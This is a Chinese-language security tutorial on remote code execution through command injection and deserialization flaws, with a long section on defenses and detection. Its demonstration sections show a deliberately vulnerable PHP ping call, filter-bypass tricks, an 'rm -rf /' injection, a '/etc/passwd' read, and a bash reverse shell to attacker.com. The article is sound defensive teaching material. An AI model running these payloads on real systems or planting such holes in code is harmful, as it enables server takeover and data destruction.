远程代码执行（RCE）——命令注入与反序列化漏洞

远程代码执行（RCE）——命令注入与反序列化漏洞

摘要：远程代码执行（Remote Code Execution, RCE）是最严重的黑客网站攻击之一，允许攻击者在目标服务器上执行任意系统命令或代码，从而导致服务器完全沦陷。RCE通常源于输入未经严格过滤便传给系统命令解释器（如system()、eval()）或不安全的反序列化。本文从命令注入和反序列化两个维度深入分析RCE原理，展示渗透测试常用载荷，并给出输入白名单、禁用危险函数、升级依赖库等防御建议。

关键词：黑客网站攻击；远程代码执行；RCE；命令注入；反序列化漏洞；渗透测试；服务器安全

---

一、引言

在黑客入侵的最终阶段，攻击者往往追求在目标系统上执行任意代码。RCE漏洞直接赋予攻击者服务器操作系统级别的权限，可进行文件读写、反弹Shell、安装挖矿木马等。2021年Log4j2漏洞（CVE-2021-44228）即是一种典型的RCE，影响了全球数百万应用。理解RCE的成因与防御手段，是保护网站不被彻底攻破的关键。

二、命令注入型RCE2.1 原理

当应用程序调用系统命令处理用户输入（如ping、dig、grep），却未对输入进行严格过滤时，攻击者可通过插入管道符、分号、反引号等执行额外命令。

2.2 典型漏洞代码（PHP）[size=12.573px]php



$ip = $_GET['ip';system("ping -c 4 " . $ip);

输入8.8.8.8; rm -rf /，执行的命令变为：ping -c 4 8.8.8.8; rm -rf /，导致毁灭性后果。

2.3 命令注入绕过技巧

• 使用|（管道符）、||、&、&&、\n、$(command)、反引号。
• 编码绕过：%0a（换行）、%0d（回车）。
• 利用环境变量或特殊变量：${IFS}代替空格。
  
  

三、反序列化型RCE3.1 原理

序列化是将对象转换为可存储/传输的格式（如Java的Serializable、Python的pickle、PHP的serialize）。反序列化时，如果用户可控的序列化数据被反序列化，且应用包含“魔术方法”（如__wakeup、__destruct、readObject），攻击者可构造特定对象触发方法链，最终执行任意代码。

3.2 经典场景：Java反序列化

使用Apache Commons Collections的Transformer链，攻击者发送特殊序列化数据，触发Runtime.exec()。

3.3 渗透测试思路

• 寻找接受序列化数据的端点（Cookie、请求体、参数值包含rO0AB（Base64编码的Java序列化特征））。
• 使用ysoserial工具生成常用gadget链的payload。
• 发送payload，观察服务器是否执行如dnslog.cn的DNS查询或延时响应。
  
  

四、渗透测试演示：命令注入

场景：一个提供域名查询的API：https://example.com/dns?domain=example.com，后端调用nslookup {domain}。

步骤1：探测注入
输入example.com; sleep 5，若响应延迟5秒，则存在注入。

步骤2：获取敏感信息
example.com; cat /etc/passwd 返回文件内容（需结合错误输出或curl外带）。

步骤3：反弹Shell
example.com; bash -i >& /dev/tcp/attacker.com/4444 0>&1（需URL编码空格为%20或${IFS}），攻击者监听端口获得Shell。

五、防御RCE的完整方案5.1 命令注入防御

• 避免使用系统命令：尽量使用编程语言内置的API替代（如PHP的filter_var验证IP，而非调用ping）。
• 输入白名单：例如仅允许domain参数包含域名、数字和点号，使用正则^[a-zA-Z0-9.-]+$。
• 参数化或转义：如果必须调用命令，使用escapeshellarg()（PHP）或subprocess.list2cmdline确保参数被当作单参数传递。
• 禁用危险函数：在disable_functions（PHP）中禁用exec、system、passthru、shell_exec、proc_open等。
  
  

5.2 反序列化防御

• 禁止反序列化不可信数据：不要对用户提交的序列化字符串进行反序列化。
• 使用安全替代格式：使用JSON、XML等结构化数据，避免语言原生的序列化。
• 签名与加密：对序列化数据使用HMAC或加密，确保未被篡改（适用于Cookie等存储）。
• 维护库版本：及时更新第三方库，修复已知gadget链（如Commons Collections 3.2.2更新了反序列化限制）。
• JEP 290（Java）：对于Java应用，启用反序列化过滤器（Java 9+）限制允许的类。
  
  

5.3 纵深防御

• 运行Web服务使用最低权限用户（非root）。
• 配置SELinux或AppArmor限制可执行命令范围。
• 部署RASP（Runtime Application Self-Protection）实时检测命令执行行为。
  
  

六、检测RCE漏洞的方法

• 黑盒渗透测试：在不同输入点尝试注入ping xxx.dnslog.cn，观察DNS记录。
• 白盒代码审计：搜索exec、eval、popen、serialize、unserialize、ObjectInputStream等关键字。
• 动态分析：使用DAST工具（如Burp的主动扫描）自动检测命令注入。
  
  

七、总结

RCE漏洞级别极高，可导致服务器完全失陷。防御重点在于：绝不执行不可信输入，如果必须调用系统命令，使用白名单限制参数；绝不反序列化用户提供的数据，改用JSON。同时，应通过最小权限和运行时监控减轻被攻击后的影响。